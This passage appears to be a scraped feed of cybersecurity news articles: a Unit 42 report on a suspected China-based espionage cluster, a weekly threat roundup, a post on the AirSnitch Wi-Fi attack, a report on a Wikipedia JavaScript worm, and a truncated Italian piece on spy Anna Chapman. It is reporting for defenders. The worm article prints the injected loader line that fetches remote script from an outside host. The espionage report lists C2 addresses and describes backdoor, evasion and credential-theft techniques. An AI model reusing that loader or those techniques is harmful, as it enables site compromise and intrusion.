servizi informatici interni. L’autonomia tecnologica è strettamente correlata alla resilienza cibernetica di un Paese.
cybersecitalia.itMar 25, 2026extracted
Suspected China-Based Espionage Operation Against Military Targets in Southeast Asia
We identified a cluster of malicious activity targeting Southeast Asian military organizations, suspected with moderate confidence to be operating out of China. We designate this cluster as CL-STA-1087, with STA representing our assessment that the activity is conducted by state-sponsored actors. We traced this activity back to at least 2020. The activity demonstrated strategic operational patience and a focus on highly targeted intelligence collection, rather than bulk data theft. The attackers behind this cluster actively searched for and collected highly specific files concerning military capabilities, organizational structures and collaborative efforts with Western armed forces. The objective-oriented tool set used in the malicious activity includes several newly discovered assets: the AppleChris and MemFun backdoors, and a custom Getpass credential harvester. This persistent espionage campaign against regional military entities is characterized by the deployment of custom-developed tools and highly stable operational infrastructure. We share our analysis of the attackers’ methods and tools to help defenders detect and protect against these advanced attacks. Palo Alto Networks customers are better protected from the threats discussed above through the following products and services: Advanced URL Filtering and Advanced DNS Security Advanced WildFire Cortex XDR and XSIAM Cortex Cloud Cortex Cloud Identity Security If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team. The investigation began after Cortex XDR agents, newly deployed across the environment, detected suspicious PowerShell activity indicating an existing compromise. The detection revealed an ongoing attack targeting multiple endpoints within the network. Attackers established persistence on an unmanaged endpoint that they used to execute malicious PowerShell scripts remotely across selected systems. The script content is shown in Figure 1. The PowerShell scripts were designed to sleep for six hours (21,600 seconds) and then create reverse shells to one of four command and control (C2) servers: 154.39.142[.]177 154.39.137[.]203 8.212.169[.]27 109.248.24[.]177 Our analysis of the timeline and script deployment patterns indicated that this was part of an established intrusion already in progress. The initial infection vector remains undetermined. Following the identification of the persistence mechanism, the environment appeared to be dormant for several months, with no observable malicious activity. We assess that the attackers deliberately maintained their foothold in the environment, waiting for an opportune moment to resume their operations. When the attackers renewed active operations from the unmanaged endpoint, multiple security alerts were triggered, as Figure 2 shows. The alerts indicated the deployment of several malicious tools and suspicious activity across the compromised environment including outbound C2 communications, lateral movement and persistence. The renewed campaign began with attackers delivering an initial backdoor payload from the unmanaged endpoint to a server in the environment. We named this backdoor AppleChris, after the 0XFEXYCDAPPLE05CHRIS mutex that forms part of the malware infection chain. From this initial foothold, the attackers orchestrated a systematic spread across the network. They used a combination of Windows Management Instrumentation (WMI) and native Windows .NET commands to deploy malware to additional endpoints, as Figure 3 shows. The attackers targeted critical network infrastructure components: Domain controllers Web servers IT workstations Executive-level assets To establish persistence, the attackers created a new service to facilitate payload execution. They also carried out DLL hijacking by storing a malicious DLL in the system32 folder and registering it to be loaded by an existing shadow copy service. While the core of the AppleChris malware remained consistent throughout the campaign, the attackers deployed different variants across target endpoints. This approach was likely taken to maintain persistence across diverse system configurations and to evade detection by varying their operational signatures. The list of variants observed and analyzed is available in the New and Undocumented Tools section. After moving laterally through the network and establishing persistence, the attackers began to collect data. We observed highly selective searches for sensitive files related to: Official meeting records Joint military activities Detailed assessments of operational capabilities The attackers showed particular interest in files related to military organizational structures and strategy, including command, control, communications, computers and intelligence (C4I) systems. During our investigation, we identified two different backdoors deployed by the attackers: AppleChris and MemFun. The backdoors differ in functionality and capabilities but share a common pattern: Both use custom HTTP verbs and the dead drop resolver (DDR) technique to access a shared Pastebin account. Figure 4 shows that both backdoors use the same Pastebin repository to resolve their respective C2 addresses. Our analysis revealed multiple variants of the AppleChris backdoor. We recovered different types of Portable Executable (PE) files and categorized them into two primary variants, based on their functionality and compilation timestamp. The variants share similar core backdoor functionality but differ in their DDR implementation strategies: Dropbox variant - The initial iteration represents the earlier development phase, with the filename swrpv.sys - The Dropbox variant implements a dual DDR approach: - Using an attacker-controlled Dropbox account as the primary DDR source - Falling back to a Pastebin-based DDR as a secondary option Tunneler variant - The more recent variant with expanded capabilities, using the following names: - swrpv.sys - update.exe - Googleupdate.exe - The Tunneler variant represents a streamlined evolution that consolidates to a single Pastebin-based DDR, while introducing advanced network proxy capabilities The more recent variant with expanded capabilities, using the following names: At the time of our investigation, both variants were still in use. A detailed comparison table of notable features of both variants is available in Appendix A. The following analysis focuses on the more recent Tunneler variant and demonstrates the full spectrum of AppleChris capabilities. AppleChris enables flexible deployment through multiple PE variants. While some variants operate as standalone executables, others are deployed as DLLs, using various persistence techniques. In several observed instances, the attackers performed DLL hijacking by placing the malicious swprv32.sys AppleChris DLL in the system32 directory. Subsequently, they established persistence by registering the malicious DLL as a component of the Volume Shadow Copy Service. This allowed the malware to leverage elevated privileges while masquerading as a legitimate Windows process to evade detection. To bypass automated security systems, some of the malware variants employ sandbox evasion tactics at runtime. These variants trigger delayed execution through sleep timers of 30 seconds (EXE) and 120 seconds (DLL), effectively outlasting the typical monitoring windows of automated sandboxes. Single-instance execution is enforced via the 0XFEXYCDAPPLE05CHRIS mutex, which causes the process to terminate if another instance is detected. AppleChris employs a DDR technique to dynamically resolve its C2 server IP address. This approach effectively evades static block lists and hard-coded indicators-of-compromise (IoC) detection. It also provides operational flexibility, allowing threat actors to modify C2 infrastructure without redeploying malware. The backdoor accesses a specific Pastebin URL to retrieve the encrypted C2 IP address. The retrieved content undergoes a two-stage decryption process: The raw text is Base64-decoded The decoded text is decrypted using an embedded RSA-1024 private key This cryptographic approach ensures that even if the Pastebin account is discovered, the actual C2 server information remains protected, as the corresponding private key is embedded within the malware. The alert for Pastebin access is shown in Figure 5. Following successful C2 resolution, AppleChris enters its primary beaconing loop. To facilitate session management and command execution, the malware generates a 10-byte random sequence as a unique session identifier, which is concatenated with the computer name and hex-encoded MAC address. This registration data is RSA-encrypted and transmitted to the C2 server within the payload of an HTTP GET request, demonstrating a dual-key architecture that securely shares the session key for subsequent communication. The server’s response contains the command payload, which is then decrypted using AES. The 10-byte session ID, padded with 14 zeros, serves as the key. A hard-coded initialization vector embedded in the binary is also used: [SessionID (10 bytes)] + [0xFF (14 bytes)] The malware implements a comprehensive command dispatcher that interprets single-byte command identifiers to execute a wide range of backdoor functionality, including: Drive enumeration Directory listing File upload, download and deletion Process enumeration Remote shell execution Silent process creation In addition, the Tunneler variant supports a command to activate the proxy tunneling module. Each command response utilizes custom HTTP requests as communication parameters (PUT, POT, DPF, UPF, CPF, LPF) to facilitate command tracking and response handling. An example is shown in Figure 6 below. The full list is provided in Appendix B. MemFun is multi-stage malware that consists of three components: Initial loader named GoogleUpdate.exe In-memory downloader Final payload – a DLL retrieved from the C2 server containing the MemFun export After the initial dropper execution, the entire attack chain operates in memory, employing evasion techniques and reflective loading. The loader's primary purpose is to establish communication with the C2 server and download an additional DLL that contains an exported MemFun function. This function is then executed to initiate the main backdoor. Since the final payload is retrieved from the C2 server, attackers can deploy different modules based on their objectives, making MemFun a modular malware platform rather than a static backdoor. The MemFun execution chain is illustrated in Figure 7. The execution chain begins with the MemFun dropper, which immediately runs anti-forensic checks to avoid detection. Upon execution, the dropper performs timestomping. It retrieves the creation timestamp of the Windows System directory and sets its own file creation timestamp to match it, making the malware appear to be the same age as legitimate system files. Rather than writing additional files to disk, the dropper employs process hollowing to inject its payload into memory. It launches dllhost.exe in a suspended state and decrypts an embedded shellcode payload using the XOR key 0x25. The decrypted shellcode is then injected into the suspended process, which is resumed to execute the malicious code. This technique ensures that the malicious code runs under the guise of a legitimate Windows process, while leaving no additional artifacts on disk. The injected shellcode functions as a loader that locates itself in memory and scans to find the embedded MemFun Loader DLL. The shellcode performs reflective DLL loading. Before transferring execution to the MemFun Loader, the shellcode implements another anti-forensics measure: zeroing the first 4 KB of allocated memory, to erase DOS and PE headers. This makes the loaded module invisible to memory analysis tools that rely on header signatures. The MemFun in-memory downloader initializes with multiple evasion techniques, including the creation of a mutex named GOOGLE and anti-debug measures to evade analysis. The downloader performs token impersonation to steal and impersonate logged-on user credentials, allowing it to inherit user proxy settings and bypass network restrictions that might block system-level processes. Communication with the C2 server uses HTTP requests with a custom pattern Q instead of the standard GET/POST commands, targeting the /DL1 resource to download the final payload. The requests also include distinctive headers such as Get: 0 and User-Agent: MyIE. The downloader implements session-specific encryption by generating a unique 24-byte Blowfish key for each execution. This dynamically generated key is sent to the C2 server via the HTTP Cookie header, allowing the server to encrypt the backdoor payload specifically for that execution session. Upon receiving the encrypted MemFun backdoor from the /DL1 resource, the loader decrypts the payload using its unique session key. It then performs reflective loading to execute the backdoor in memory by calling the exported MemFun function. In addition to the two backdoors, our analysis revealed a custom credential-harvesting tool. We have designated this tool Getpass, reflecting the internal getpass name utilized by the attackers. Getpass is a custom version of Mimikatz, packaged as a standalone DLL that attempts to masquerade as a legitimate Palo Alto Networks tool under the Cyvera directory, as Figure 8 shows. Upon execution, the malware’s vncpass function escalates privileges by acquiring SeDebugPrivilege. It then systematically targets 10 specific Windows authentication packages, including MSV, WDigest, Kerberos and CloudAP. The malware attempts to extract plaintext passwords, NTLM hashes and authentication data directly from the lsass.exe process memory. Unlike standard Mimikatz, which provides an interactive console, this variant automatically runs its credential-harvesting routine and logs the stolen data to a file named WinSAT.db, which masquerades as a legitimate Windows system database. The infrastructure behind CL-STA-1087 reveals insights into the entire operation's scope and longevity. File timestamps, Pastebin creation dates and malware compilation times all trace back to 2020, indicating a long-running campaign. The timestamps for the Pastebin account creation and the pastes are shown in Figure 9. The presence of multiple C2 IP addresses in the Pastebin pages indicates operational compartmentalization, allowing the actor to rotate infrastructure based on the target's profile. Our analysis suggests that the attackers maintained communication with multiple compromised networks over an extended period, leveraging Pastebin and Dropbox for C2 distribution. Notably, while the AppleChris Dropbox samples we encountered appeared to be older than the Tunneler samples, they were still functional and in active use at the time of our investigation. Evidence suggests the threat actor behind the activity cluster continues to update their Dropbox account with updated infrastructure files. We identified multiple indications that this activity was conducted by a threat actor affiliated with the Chinese nexus. Our analysis of command execution timestamps and interactive session logs revealed the attackers’ operational schedule. By examining hands-on-keyboard activity originating from both backdoors and the unmanaged endpoint over multiple weeks, we identified distinct temporal patterns in their operations. The data revealed that malicious activities consistently occurred during business hours, specifically aligning with a UTC+8 time zone schedule. As Figure 10 illustrates, the periods of activity align with typical office hours across several Asian regions, including China. The threat actor targets military organizations in Southeast Asia. We observed specific searches for military-related information. The attackers used China-based cloud network infrastructure for their C2 servers. We also observed that the login page of one of the C2 servers was written in Simplified Chinese. The activity cluster CL-STA-1087 is a suspected espionage campaign operating out of China and targeting military organizations across Southeast Asia. The threat actor behind the cluster demonstrated operational patience and security awareness. They maintained dormant access for months while focusing on precision intelligence collection and implementing robust operational security measures to ensure campaign longevity. The backdoors used in this campaign operate on shared infrastructure and employ evasion methods such as Dead Drop Resolver. These techniques demonstrate the attackers’ long-term commitment to their objectives and meticulous attention to operational security practices that are designed to maintain persistent access. We encourage security practitioners to leverage the indicators and analysis provided in this article to enhance detection capabilities, and to strengthen defensive postures against advanced persistent threats targeting critical military infrastructure and strategic assets. For Palo Alto Networks customers, our products and services provide the following coverage associated with this activity cluster: Advanced WildFire cloud-delivered malware analysis service accurately identifies the AppleChris and MemFun samples mentioned in this article as malicious. Advanced URL Filtering and Advanced DNS Security identify known network IoCs associated with this activity as malicious. Cortex XDR and XSIAM help to prevent the threats described above, by employing the Malware Prevention Engine. This approach combines several layers of protection, including Advanced WildFire, Behavioral Threat Protection and the Local Analysis module, designed to prevent both known and unknown malware from causing harm to endpoints. The use of a legitimate cloud service to host C2 infrastructure indicates the potential for the actor behind CL-STA-1087 to use cloud-native operations. Cortex Cloud customers are better protected through the proper placement of Cortex Cloud XDR endpoint agent and serverless agents within a cloud environment. Designed to protect a cloud’s posture and runtime operations against these threats, Cortex Cloud helps detect and prevent the malicious operations or configuration alterations or exploitations discussed within this article. Cortex Cloud Identity Security encompasses Cloud Infrastructure Entitlement Management (CIEM), Identity Security Posture Management (ISPM), Data Access Governance (DAG) as well as Identity Threat Detection and Response (ITDR) and provides clients with the necessary capabilities to improve their identity-related security requirements. Should the operations move into cloud environments, Cortex Cloud can help detect misconfigurations and unwanted access to sensitive data. It also conducts real-time analysis of usage and access patterns. This provides visibility into cloud identities and their permissions. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42) UK: +44.20.3743.3660 Europe and Middle East: +31.20.299.3130 Asia: +65.6983.8730 Japan: +81.50.1790.0200 Australia: +61.2.4062.7950 India: 000 800 050 45107 South Korea: +82.080.467.8774 Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance. SHA256 hashes of the AppleChris tunnel variant: 9e44a460196cc92fa6c6c8a12d74fb73a55955045733719e3966a7b8ced6c500 5a6ba08efcef32f5f38df544c319d1983adc35f3db64f77fa5b51b44d0e5052c 0e255b4b04f5064ff97da214050da81a823b3d99bce60cdd9ee90d913cc4a952 SHA256 hashes of the AppleChris Dropbox variant: 413daa580db74a38397d09979090b291f916f0bb26a68e7e0b03b4390c1b472f 2ee667c0ddd4aa341adf8d85b54fbb2fce8cc14aa88967a5cb99babb08a10fae SHA256 hash of MemFun: ad25b40315dad0bda5916854e1925c1514f8f8b94e4ee09a43375cc1e77422ad SHA256 hash of Getpass: ee4d4b7340b3fa70387050cd139b43ecc65d0cfd9e3c7dcb94562f5c9c91f58f IPv4 addresses of the C2 servers: 8.212.169[.]27 8.220.135[.]151 8.220.177[.]252 8.220.184[.]177 116.63.177[.]49 118.194.238[.]51 154.39.142[.]177 154.39.137[.]203 Hijack Execution Flow: DLL – MITRE ATT&CK Indicator Removal: Timestomp – MITRE ATT&CK Mimikatz – MITRE ATT&CK Process Injection: Process Hollowing – MITRE ATT&CK Reflective Code Loading – MITRE ATT&CK Web Service: Dead Drop Resolver – MITRE ATT&CK It’s All in the Name: How Unit 42 Defines and Tracks Threat Adversaries – Unit 42, Palo Alto Networks Blowfish Cipher – Wikipedia Table 1 shows the differences between the two AppleChris variants: Dropbox and Tunnel. Table 1. Comparison table between AppleChris variants. Table 2 lists the AppleChris commands shared by the Dropbox and Tunnel variants. Table 2. AppleChris supported commands.
unit42.paloaltonetworks.comMar 12, 2026extracted
9th March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 9th March, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES AkzoNobel, a Netherlands-based global paint manufacturer, has confirmed a cyberattack affecting one of its United States sites. The company said the intrusion was contained, while the Anubis ransomware group claimed it stole 170 GB of data, including employee and financial records. LexisNexis, a global legal data and analytics provider, has suffered a breach. Attackers claimed they stole 3.9 million records, including about 400,000 user profiles and some government accounts, while the company said the exposed systems mainly held legacy pre-2020 data. The Wikimedia Foundation, the nonprofit behind Wikipedia, has faced a self-propagating JavaScript worm that vandalized pages and replaced editor scripts across multiple wikis. Engineers briefly restricted editing while cleaning up the incident, with about 3,996 pages modified and roughly 85 users’ personal scripts affected. TriZetto Provider Solutions, an American healthcare technology company owned by Cognizant, has disclosed a breach affecting more than 3.4 million people. The exposed data includes insurance and medical information, with notifications issued this week after investigators determined the unauthorized access began in 2024. AI THREATS Researchers outlined how Pakistan-linked APT36 has used AI coding tools to produce large volumes of low-quality malware aimed at Indian government entities and embassies. The group generated variants in less common programming languages and used legitimate cloud services for command channels, complicating detection and response. Researchers uncovered AI-themed Chrome and Edge extensions that harvest LLM chat histories and browsing activity. Distributed via the Chrome Web Store, they impersonate legitimate tools and have impacted 900,000 users across 20,000 enterprise environments. Researchers tracked a campaign abusing interest in OpenClaw, an AI agent, by planting fake installers on GitHub that appeared in Bing search results. The installers delivered Vidar to steal credentials and cryptocurrency wallets and sometimes deployed GhostSocks, turning infected systems into residential proxies. Researchers demonstrated indirect prompt injection campaigns against AI agents that read web content, cataloging 22 techniques across live sites. Hidden instructions can redirect agents to expose data, perform unauthorized transactions, and run server commands, and the researchers also observed a real-world bypass of an AI ad review system. VULNERABILITIES AND PATCHES Google has published patches for CVE-2026-0628, a high-severity vulnerability in Chrome’s Gemini AI panel that allowed malicious extensions to inject code and access cameras and microphones. Researchers showed attackers could also take screenshots, access local files, and launch phishing content inside the panel. A patch was released for CVE-2026-1492, a critical (9.8 CVSS) privilege escalation flaw in the User Registration & Membership WordPress plugin. The vulnerability lets unauthenticated attackers create administrator accounts and take over sites. VMware has patched CVE-2026-22719, a high-severity command injection flaw in Aria Operations, its cloud management platform. The vulnerability allows unauthenticated remote code execution during support-assisted migrations and affects versions 8 through 8.18.5 and 9 through 9.0.1, with patches and a workaround script available. Qualcomm has addressed CVE-2026-21385, a memory corruption vulnerability affecting chipsets used in Android phones, tablets, and IoT devices. The flaw can trigger crashes and potentially allow code execution, and CISA said evidence of active exploitation prompted its addition to the Known Exploited Vulnerabilities catalog. THREAT INTELLIGENCE REPORTS Check Point Research have mapped Iran-linked cyber clusters conducting espionage, disruption, and influence operations, including Cotton Sandstorm, Educated Manticore, MuddyWater, Handala, and Agrius. Recent campaigns used impersonation and phishing to steal credentials, remote access tools to persist, and wipers or fake ransomware for impact. Check Point Research revealed that, amid the ongoing conflict with Iran, IP cameras in Israel, Qatar, Bahrain, Kuwait, the UAE, and Cyprus have been intensively targeted. Notably, these countries have also experienced significant missile activity from Iran. The findings align with the assessment that Iran incorporates compromised cameras into its operational doctrine, using them both to support missile operations and to conduct ongoing battle damage assessment (BDA). Check Point Research has profiled Silver Dragon, a Chinese-aligned group linked to APT41 that targeted government and enterprise networks across Southeast Asia and Europe. Recent operations used the GearDoor backdoor with SSHcmd and SilverScreen, enabling remote access, covert screen capture, and stealthy control after phishing and server exploitation. Check Point Harmony Endpoint and Threat Emulation provide protection against these threats Researchers have uncovered Coruna, an iPhone exploit kit used by Chinese scammers and Russia-linked operators to compromise devices through malicious websites. The toolkit used 23 exploits against iOS and deployed malware that stole cryptocurrency, emails, and photos.
research.checkpoint.comMar 9, 2026extracted
New Attack Against Wi-Fi
New Attack Against Wi-Fi It’s called AirSnitch: Unlike previous Wi-Fi attacks, AirSnitch exploits core features in Layers 1 and 2 and the failure to bind and synchronize a client across these and higher layers, other nodes, and other network names such as SSIDs (Service Set Identifiers). This cross-layer identity desynchronization is the key driver of AirSnitch attacks. The most powerful such attack is a full, bidirectional machine-in-the-middle (MitM) attack, meaning the attacker can view and modify data before it makes its way to the intended recipient. The attacker can be on the same SSID, a separate one, or even a separate network segment tied to the same AP. It works against small Wi-Fi networks in both homes and offices and large networks in enterprises. With the ability to intercept all link-layer traffic (that is, the traffic as it passes between Layers 1 and 2), an attacker can perform other attacks on higher layers. The most dire consequence occurs when an Internet connection isn’t encrypted—something that Google recently estimated occurred when as much as 6 percent and 20 percent of pages loaded on Windows and Linux, respectively. In these cases, the attacker can view and modify all traffic in the clear and steal authentication cookies, passwords, payment card details, and any other sensitive data. Since many company intranets are sent in plaintext, traffic from them can also be intercepted. Even when HTTPS is in place, an attacker can still intercept domain look-up traffic and use DNS cache poisoning to corrupt tables stored by the target’s operating system. The AirSnitch MitM also puts the attacker in the position to wage attacks against vulnerabilities that may not be patched. Attackers can also see the external IP addresses hosting webpages being visited and often correlate them with the precise URL. Here’s the paper.
schneier.comMar 9, 2026extracted
Wikipedia hit by self-propagating JavaScript worm that vandalized pages
Update: Added Wikimedia Foundation's statement below and made a correction to denote it was only the Meta-Wiki that was vandalized. The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages. Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages. Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes. The JavaScript worm According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code. The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects. Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account. BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone. MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User: /common.js, which are executed in editors’ browsers to customize the wiki interface. After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges: User-level persistence: it tried to overwrite User: /common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in. Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script. If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below. The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader. [[File:Woodpecker10.jpg|5000px]] [[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]] According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted. As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts. During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories. At the time of writing, the injected code has been removed, and editing is once again possible. However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained. Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored. "Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved. The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation's public incident log." Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 5, 2026extracted
Anna Chapman e l’illegal Program: la spy story, tra hacking, spionaggio e FBI
Anna Chapman, è stato un agente dell’intelligence russa che venne arrestata con l’accusa di lavorare come spia per il governo di Mosca, a giugno del 2010 quando viveva a New York. La Chapman si è dichiarata colpevole ed è stata estradata in Russia nel luglio 2010, nel più grande affare di scambio di spie dal 1986. Il suo bell’aspetto ha reso Chapman al centro dei riflettori dei media, e al suo ritorno in Russia ha posato per una rivista maschile oltre ad essere ospite di programmi televisivi. In questo articolo scopriremo perché i media definiscono Anna Chapman un “hacker”, e siccome l’essere hacker è un appellativo che può essere riconosciuto solo dagli altri, abbiamo approfondito la cosa. Anna Chapman (nome da nubile Anna Vasilyevna Kushchenko (in russo: А́нна Васи́льевна Кущенко) è nata a Volgograd il 23 febbraio del 1982. SI tratta di una città della Russia di circa un milione di abitanti. Suo padre era un alto funzionario del KGB impiegato presso l’ ambasciata sovietica a Nairobi , in Kenya. La casa della famiglia si trova nel distretto sudoccidentale di Ramenki, un tempo distretto d’élite per funzionari del KGB, diplomatici di medio rango e ufficiali dell’esercito. Secondo Komsomolskaya Pravda, Kushchenko. il padre occupava una posizione di rilievo presso il ministero noto con la sigla russa MID (affari esteri). Secondo il suo ex marito, Anna ha conseguito un master in economia con lode presso l’ Università di Mosca. Secondo altre fonti, si è laureata alla Peoples’ Friendship University of Russia. Anna Kushchenko incontrò Alex Chapman ad un rave party dei Docklands di Londra nel 2001. Si sposarono poco dopo a Mosca e ottenne la cittadinanza e un passaporto britannico, oltre a quella nativo russo. Nel 2003 o 2004, Anna Chapman si trasferì a Londra dove ha lavorato presso NetJets, Barclays e presumibilmente in alcune altre società per brevi periodi. Anna e Alex Chapman divorziarono nel 2006. Nel marzo 2018, venne riferito che Alex Chapman era morto nel maggio 2015, all’età di 36 anni, per overdose. Il 5 luglio 2010, venne riferito che la Chapman poteva essere stata reclutata per diventare un agente quando era nel Regno Unito, citando Oleg Gordievsky e Alex Chapman come fonti. Nel 2009, Anna Chapman si trasferì a New York, stabilendosi al 20 Exchange Place, a un isolato da Wall Street a Manhattan. Il profilo del suo sito di social network LinkedIn l’ha identificata come CEO di PropertyFinder LLC, un sito web che vende immobili a livello internazionale. Suo marito Alex ha dichiarato che Anna gli avrebbe detto che l’impresa era continuamente indebitata per i primi due anni. Ma improvvisamente nel 2009 aveva fino a 50 dipendenti diventando una azienda di successo. La Chapman ha pubblicato delle sue foto sul sito web di social network Odnoklassniki (“Compagni di classe”) in Russia, dove ha dichiarato: “Russia, Mosca. Il mio posto preferito sulla terra, la mia capitale natale!” Ha anche pubblicato foto e profili sui siti di social network quali Facebook e LinkedIn. Secondo quanto riferito, Anna Chapman aveva una relazione con Michel Bittan, proprietario di un ristorante israelo-marocchino, mentre viveva a New York. In quel periodo, avrebbe tentato di acquistare pastiglie di ecstasy. In seguito ha descritto il suo tempo negli Stati Uniti con la citazione di Charles Dickens, “è stato il migliore dei tempi, è stato il peggiore dei tempi”. Nel giugno del 2010 l’FBI ha pubblicizzato l’arresto di dieci persone che avevano lavorato come agenti segreti per il governo russo sotto copertura “non” ufficiale. Sebbene la natura delle informazioni sensibili passate ai loro gestori russi rimanga poco chiara al pubblico (così come la loro capacità di accedere a informazioni governative riservate o classificate), ciò che è noto sono le metodologie di comunicazione utilizzate dalle spie e dei loro associati, nonché gli errori che il gruppo ha fatto facendo saltare la loro copertura e la loro operazione. i dieci membri dell'”illegal program” I commentatori hanno criticato l’apparente disattenzione del gruppo di spie russe, chiamate “Illegal Program“, e la mancanza di misure precauzionali adottate per rimanere fuori dai radar dell’FBI. ABC News pubblicò una storia citando gli ex membri del KGB che chiamavano gli addetti allo spionaggio dei “dilettanti ridicoli”, ed in effetti, tutti i torti non li avevano. Fatto è che le autorità statunitensi hanno scoperto la rete di spionaggio solo a seguito di una soffiata ricevuta da un insider russo. Se il traditore (chiamato Alexander Poteyev) non avesse avvisato l’FBI delle attività delle spie, è probabile che sarebbero ancora in attività oggi. Tuttavia, ciò che ci interessa è il punto di vista tecnico diquello che il gruppo della Chapman svolgeva, e nello specifico comprendere: Le denunce penali presentate in seguito in vari tribunali distrettuali federali affermano che la rete russa nella quale faceva parte la Chapman, ha restituito informazioni all’SVR (Foreign Intelligence Service della Federazione Russa) tramite messaggi nascosti all’interno di: Quest’ultima modalità veniva svolta da agenti, scambiando borse identiche mentre si incrociavano nella tromba delle scale di una stazione ferroviaria. I messaggi e materiali scambiati, sono stati trasmessi nei luoghi più impensati, come Grand Central Terminal e Central Park, mente l’FBI leggeva le loro e-mail, decifrando le loro informazioni, leggendo i testi codificati incorporati nelle immagini pubblicate in Rete, intercettando i loro telefoni cellulari, filmando il passaggio di sacchi di denaro e messaggi con inchiostro invisibile da un agente all’altro. Molti ex agenti hanno pubblicamente affermato che alcuni degli errori osservati dall’FBI erano decisamente umilianti. Nell’esempio forse più famoso, La Chapman aveva registrato il cellulare utilizzando un nome e un indirizzo fittizio (99 Fake Street), ma l’FBI recuperò la ricevuta che la Chapman aveva gettato via in un bidone della spazzatura pubblico. Altri membri come Kutsik e Pereverzeva hanno ricevuto trasmissioni radio appositamente codificate dal loro appartamento di Seattle in un grattacielo e l’FBI è entrata segretamente nella loro casa dove hanno trovato numeri casuali usati per decodificare i “radiogrammi”. Un altro membro del gruppo, Semenko è stato notato per la prima volta dall’FBI il 5 giugno quando ha utilizzato un computer in un ristorante per inviare messaggi crittografati presumibilmente a un’auto parcheggiata per 20 minuti accanto al suo ristorante con la targa diplomatica russa, guidata da un funzionario russo che era noto per aver trasferito denaro ad altri agenti russi nel 2004. Nel suo riassunto delle tecniche di comunicazione delle spie russe, Wikipedia afferma: “Gli agenti russi hanno utilizzato reti Wi-Fi private, chiavi di memoria flash e messaggi di testo nascosti in immagini grafiche per scambiare informazioni. È stato utilizzato un software steganografico personalizzato sviluppato a Mosca in cui i messaggi nascosti sono stati inseriti in file innocui. Questo programma veniva avviato utilizzando i tasti Control-Alt-E e inserendo una password di 27 caratteri, che l’FBI ha trovato trascritta. Sono stati utilizzati anche burst codificati di dati da un trasmettitore radio a onde corte. Sono stati utilizzati anche degli inchiostri invisibili e lo scambio di borse in luoghi pubblici.” La Chapman ha usato il suo laptop in un bar di New York sulla 47th Street a gennaio 2010 e ha trasferito elettronicamente i dati ad un ufficiale russo che passava da lì. Due mesi dopo, la Chapman ha utilizzato una rete Wi-Fi privata, in un negozio in Greenwich Street a New York, per comunicare con lo stesso funzionario russo, che si trovava nelle vicinanze. Inoltre ha usato un range extender per il suo laptop. I funzionari hanno affermato che la Chapman ha lavorato con una rete di altre spie, fino a quando un agente dell’FBI sotto copertura ha tentato di attirarla in una trappola in un bar di Manhattan. L’agente dell’FBI offrì a Chapman un passaporto falso, con le istruzioni di inoltrarlo a un’altra spia. Chiese: “Sei pronta per questo passo?” e la Chapman rispose: “Naturalmente”. Ma, dopo aver fatto una serie di telefonate a suo padre Vasily Kushchenko a Mosca, la Chapman ha seguito il suo consiglio e ha consegnato il passaporto a una stazione di polizia locale e venne arrestata poco dopo. Dopo che Anna fu arrestata a New York a giugno del 2010 con l’accusa di spionaggio, il marito assunse l’addetto stampa Max Clifford e vendette la sua storia al Daily Telegraph. La Chapman si dichiarò colpevole di cospirazione per agire come agente di un governo straniero senza informare il procuratore generale degli Stati Uniti. Dopo essere stati formalmente accusati, la Chapman e altri nove detenuti entrarono 